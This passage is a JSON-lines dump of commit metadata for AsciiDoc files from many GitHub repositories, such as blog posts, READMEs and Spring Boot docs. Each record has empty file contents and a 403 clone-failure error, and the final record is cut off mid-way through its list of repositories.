2017-06-25-Dealing-with-team-rejection.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb15f00c2093798405d0a8c484aef9be722ad1d6","subject":"Improvements to the Documentation","message":"Improvements to the Documentation\n\n* added Documentation for #84 and also restructured the configuration section.\n* 
moved the description of the Analysis Components to its own file and adapted the links accordingly\n* Added the conversational-api section with a focus on the Conversation and Processing results data model\n * added documentation for #79 describing how to get the information required for client widgets from the analysis results\n * there should be more information about the Webservices, but as this will change considerably with v0.7.0 it does not make sense to invest much time into this part right now\n * also included information requested by #78 and #75 in this section\n","repos":"redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti","old_file":"docs\/src\/analysis-components.asciidoc","new_file":"docs\/src\/analysis-components.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redlink-gmbh\/smarti.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ccc2df4f0585c60ba3c401631e9607c35ec7c69","subject":"Update 2017-08-11-Self-learning-applications-Abstract.adoc","message":"Update 2017-08-11-Self-learning-applications-Abstract.adoc","repos":"egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io","old_file":"_posts\/2017-08-11-Self-learning-applications-Abstract.adoc","new_file":"_posts\/2017-08-11-Self-learning-applications-Abstract.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/egorlitvinenko\/egorlitvinenko.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f5028b210e5ea0b8ef47a537c759864af880426","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c50574214df277a35c09969a324fec608c5ec1ec","subject":"Publish 20161110-1328-have-fun.adoc","message":"Publish 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1328-have-fun.adoc","new_file":"20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75bad6a1963a8e9c72bb82ce4ed738cb1cd44665","subject":"Update 2015-09-18-Test.adoc","message":"Update 2015-09-18-Test.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-Test.adoc","new_file":"_posts\/2015-09-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f354f225da8b3d960f6a02279d660120777d4fae","subject":"Update 2016-03-20-test.adoc","message":"Update 2016-03-20-test.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-test.adoc","new_file":"_posts\/2016-03-20-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ea6dbd35a08c31097e812f5fc49794af2c80693","subject":"Update 2016-6-26-PHRER.adoc","message":"Update 2016-6-26-PHRER.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHRER.adoc","new_file":"_posts\/2016-6-26-PHRER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a560efa1341bec26c68cb091ac4c61b16dd078a","subject":"Update 2017-06-12-Test.adoc","message":"Update 2017-06-12-Test.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-06-12-Test.adoc","new_file":"_posts\/2017-06-12-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55039d0bf9968275595101f5ad1bb6446ec1644c","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6acc3448ed52e49b616da98beb8606a702276fd8","subject":"y2b create post And Then The Bass Dropped...","message":"y2b create post And Then The Bass Dropped...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-02-And-Then-The-Bass-Dropped.adoc","new_file":"_posts\/2016-11-02-And-Then-The-Bass-Dropped.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d9031a0c055467666046761353233b72b8a73c7","subject":"add mesos doc","message":"add mesos doc\n","repos":"the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"docs\/mesos.asciidoc","new_file":"docs\/mesos.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"14fda42bc828e153d13ae28ea36ac09b05cf0a29","subject":"Added asciidoc doc.","message":"Added asciidoc doc.\n","repos":"rsaugier\/ytest,rsaugier\/ytest","old_file":"docs\/ytest.asciidoc","new_file":"docs\/ytest.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rsaugier\/ytest.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c42eb0590dda0b3ae109bc75e71bc40e128ac3f6","subject":"Update 2015-05-02-Test.adoc","message":"Update 2015-05-02-Test.adoc","repos":"lametaweb\/hubpressblogtests,lametaweb\/hubpressblogtests,lametaweb\/hubpressblogtests","old_file":"_posts\/2015-05-02-Test.adoc","new_file":"_posts\/2015-05-02-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/hubpressblogtests.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ee294d4d5a654ddca672d5344978a32e230b1d6","subject":"Adding 0.9.0.CR1 release announcement","message":"Adding 0.9.0.CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-01-28-debezium-0-9-0-cr1-released.adoc","new_file":"blog\/2019-01-28-debezium-0-9-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99eb6a58d74f087aa37b1e0e068f75de387b2ff3","subject":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"630c9d159ab3698402179449ba7222c6c9a86bf5","subject":"Update README","message":"Update README\n","repos":"pjanouch\/desktop-tools,pjanouch\/desktop-tools,pjanouch\/desktop-tools","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/desktop-tools.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"cec3c2ceef3dff8665c06cb9bcb0fa4b6ebaaeac","subject":"Added README.adoc which document, how to build sbuild.","message":"Added README.adoc which document, how to build sbuild.\n","repos":"SBuild-org\/sbuild,SBuild-org\/sbuild","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SBuild-org\/sbuild.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c01ade4fb882cbe9f39f7df10e0a0425a6b4d4","subject":"Refactored README links to use ASCII Doc consistent syntax","message":"Refactored README links to use ASCII Doc consistent syntax\n\nIn addition to the above, fixed links and upgraded to HTTPS 
where\npossible.\n","repos":"bkuhlmann\/ruby_setup,bkuhlmann\/ruby_setup","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/ruby_setup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d1cf179ebfb62f7a633aabbbde229ec0c0fd085","subject":"Create README.adoc","message":"Create README.adoc","repos":"marcingrzejszczak\/github-webhook","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcingrzejszczak\/github-webhook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d67a5fd4476e7525e2b67a228cb85de24edf869","subject":"Add Bintray download image","message":"Add Bintray download image\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87c215d841e7ba7c33ee15e4f77acaa31439da18","subject":"Add Coveralls coverage status badge","message":"Add Coveralls coverage status badge\n","repos":"spodin\/algorithms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02a767775546f4b68692c8ba1271ec2f01db04af","subject":"Renamed '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc' to '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc'","message":"Renamed '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc' to '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc","new_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"125483e7aa7d76b77ce0a0594db1993a6f1a1632","subject":"Add a note in the docs that default launch script only works on Linux","message":"Add a note in the docs that default launch script only works on Linux\n\nCloses 
gh-5446\n","repos":"lexandro\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,eddumelendez\/spring-boot,bbrouwer\/spring-boot,minmay\/spring-boot,rweisleder\/spring-boot,deki\/spring-boot,jvz\/spring-boot,deki\/spring-boot,felipeg48\/spring-boot,jbovet\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,ptahchiev\/spring-boot,yhj630520\/spring-boot,yangdd1205\/spring-boot,minmay\/spring-boot,sebastiankirsch\/spring-boot,tsachev\/spring-boot,sebastiankirsch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,bjornlindstrom\/spring-boot,royclarkson\/spring-boot,akmaharshi\/jenkins,brettwooldridge\/spring-boot,vpavic\/spring-boot,jvz\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,yangdd1205\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,jbovet\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,pvorb\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,isopov\/spring-boot,mdeinum\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,ollie314\/spring-boot,joshthornhill\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,joshthornhill\/spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,linead\/spring-boot,bjornlindstrom\/spring-boot,ihoneymon\/spring-boot,DeezCashews\/spring-boot,bbrouwer\/spring-boot,michael-simons\/spring-boot,olivergierke\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot-concourse,donhuvy\/spring-boot,thomasdarimont\/spring-boot,habuma\/spring-boot,htynkn\/spring-boot,i007422\/jenkins2-course-spring-boot,habuma\/spring-boot,michael-simons\/spring-boot,ihoneymon\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,nebhale\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,shangyi0102\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,royclarkson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,javyzheng\/spring-boot,qerub\/spring-boot,jvz\/spring-boot,xiaoleiPENG\/my-project,RichardCSantana\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,jbovet\/spring-boot,javyzheng\/spring-boot,cleverjava\/jenkins2-course-spring-boot,sebastiankirsch\/spring-boot,scottfrederick\/spring-boot,sbcoba\/spring-boot,isopov\/spring-boot,kdvolder\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,aahlenst\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,joshthornhill\/spring-boot,lburgazzoli\/spring-boot,yhj630520\/spring-boot,deki\/spring-boot,philwebb\/spring-boot-concourse,joshiste\/spring-boot,felipeg48\/spring-boot,cleverjava\/jenkins2-course-spring-boot,zhanhb\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-
boot,linead\/spring-boot,ihoneymon\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,afroje-reshma\/spring-boot-sample,kdvolder\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,kamilszymanski\/spring-boot,jxblum\/spring-boot,ilayaperumalg\/spring-boot,vakninr\/spring-boot,SaravananParthasarathy\/SPSDemo,linead\/spring-boot,Buzzardo\/spring-boot,javyzheng\/spring-boot,hqrt\/jenkins2-course-spring-boot,herau\/spring-boot,ilayaperumalg\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,Nowheresly\/spring-boot,minmay\/spring-boot,philwebb\/spring-boot,yangdd1205\/spring-boot,qerub\/spring-boot,chrylis\/spring-boot,kdvolder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,olivergierke\/spring-boot,aahlenst\/spring-boot,SaravananParthasarathy\/SPSDemo,linead\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,afroje-reshma\/spring-boot-sample,afroje-reshma\/spring-boot-sample,mdeinum\/spring-boot,jayarampradhan\/spring-boot,Buzzardo\/spring-boot,ihoneymon\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,olivergierke\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,brettwooldridge\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,NetoDevel\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,Buzzardo\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,mbogoevici\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,lucassaldanha\/spring-boot,joshiste\/spring-boot,tiarebalbi\/spring-boot,xiaoleiPENG\/my-project,lucassaldanha\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,yhj630520\/spring-boot,wilkinsona\/spring-boot,mosoft521\/spring-boot,deki\/spring-boot,ptahchiev\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,michael-simons\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,mosoft521\/spring-boot,aahlenst\/spring-boot,NetoDevel\/spring-boot,sbcoba\/spring-boot,javyzheng\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,candrews\/spring-boot,Nowheresly\/spring-boot,jayarampradhan\/spring-boot,bijukunjummen\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,ptahchiev\/spring-boot,royclarkson\/spring-boot,SaravananParthasarathy\/SPSDemo,bijukunjummen\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,NetoDevel\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,tiarebalbi\/spring-boot,mosoft521\/spring-boot,zhanhb\/spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,tsachev\/spring-boot,minmay\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,candrews\/spring-boot,bbrouwer\/spring-boot,jbovet\/spring-boot,pvorb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,shakuzen\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,mbenson\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,dreis2211\/spring-boot,mbogoevici\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,mbogoevici\/spring-boot,bjornlindstrom\/spring-boot,kdvolder\/spring-boot,sbcob
a\/spring-boot,akmaharshi\/jenkins,mbenson\/spring-boot,eddumelendez\/spring-boot,DeezCashews\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,mbenson\/spring-boot,vakninr\/spring-boot,nebhale\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bclozel\/spring-boot,sbcoba\/spring-boot,olivergierke\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot-concourse,joshthornhill\/spring-boot,Buzzardo\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,chrylis\/spring-boot,chrylis\/spring-boot,DeezCashews\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,royclarkson\/spring-boot,bclozel\/spring-boot,htynkn\/spring-boot,kamilszymanski\/spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,xiaoleiPENG\/my-project,vpavic\/spring-boot,hqrt\/jenkins2-course-spring-boot,htynkn\/spring-boot,javyzheng\/spring-boot,hqrt\/jenkins2-course-spring-boot,candrews\/spring-boot,jxblum\/spring-boot,mdeinum\/spring-boot,jayarampradhan\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,joshiste\/spring-boot,bijukunjummen\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,SaravananParthasarathy\/SPSDemo,herau\/spring-boot,pvorb\/spring-boot,michael-simons\/spring-boot,thomasdarimont\/spring-boot,ptahchiev\/spring-boot,vakninr\/spring-boot,habuma\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,NetoDevel\/spring-boot,bclozel\/spring-boot,DeezCashews\/spring-boot,hello2009chen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,shangyi0102\/spring-boot,jvz\/spring-boot,ilayaperumalg\/spring-boot,lucassaldanha\/spring-boot,lburgazzoli\/spring-boot,hello2009chen\/spring-boot,bijukunjummen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,lburgazzoli\/spring-boot,candrews\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,bclozel\/spring-boot,Nowheresly\/spring-boot,vpavic\/spring-boot,spring-projects\/spring-boot,RichardCSantana\/spring-boot,hqrt\/jenkins2-course-spring-boot,sebastiankirsch\/spring-boot,donhuvy\/spring-boot,zhanhb\/spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,herau\/spring-boot,htynkn\/spring-boot,akmaharshi\/jenkins,RichardCSantana\/spring-boot,nebhale\/spring-boot,mbogoevici\/spring-boot,thomasdarimont\/spring-boot,hello2009chen\/spring-boot,bjornlindstrom\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,thomasdarimont\/spring-boot,spring-projects\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,ollie314\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,sbcoba\/spring-boot,bclozel\/spring-boot,linead\/spring-boot,akmaharshi\/jenkins,bjornlindstrom\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,xiaoleiPENG\/my-project,qerub\/spring-boot,philwebb\/spring-boot,bclozel\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/deployment.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/deployment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned 
error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd18b55728bf84b7842b6fe6313e610b21dd591f","subject":"y2b create post Mysterious Touch Speaker - What Magic Is This?","message":"y2b create post Mysterious Touch Speaker - What Magic Is This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-25-Mysterious-Touch-Speaker--What-Magic-Is-This.adoc","new_file":"_posts\/2016-10-25-Mysterious-Touch-Speaker--What-Magic-Is-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"983adfc496c2ccb84748f2cec43ff69376223fdf","subject":"Update 2016-12-01-Mediashare-Chat.adoc","message":"Update 2016-12-01-Mediashare-Chat.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f690d518f6e8320e553436e5a1b64692f31f7a21","subject":"Update 2018-05-18-Testremote-save.adoc","message":"Update 2018-05-18-Testremote-save.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-05-18-Testremote-save.adoc","new_file":"_posts\/2018-05-18-Testremote-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"602d6ff5f5afb2a92192ad7b504cd4df3441b3ae","subject":"Quotes","message":"Quotes\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Search path\/Overview.adoc","new_file":"Search path\/Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0711c72cf73f1e6ec99e54e0dca12e68ad43ec7f","subject":"job #11554 initial draft of analysis note","message":"job #11554 initial draft of analysis 
note\n","repos":"rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,keithbr